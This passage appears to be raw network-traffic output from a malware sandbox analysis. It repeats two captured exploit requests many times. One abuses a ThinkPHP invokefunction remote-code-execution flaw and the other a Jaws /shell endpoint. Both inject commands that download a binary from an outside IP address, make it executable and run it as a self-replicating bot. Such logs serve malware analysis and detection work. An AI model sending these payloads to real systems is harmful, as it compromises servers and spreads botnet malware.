      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
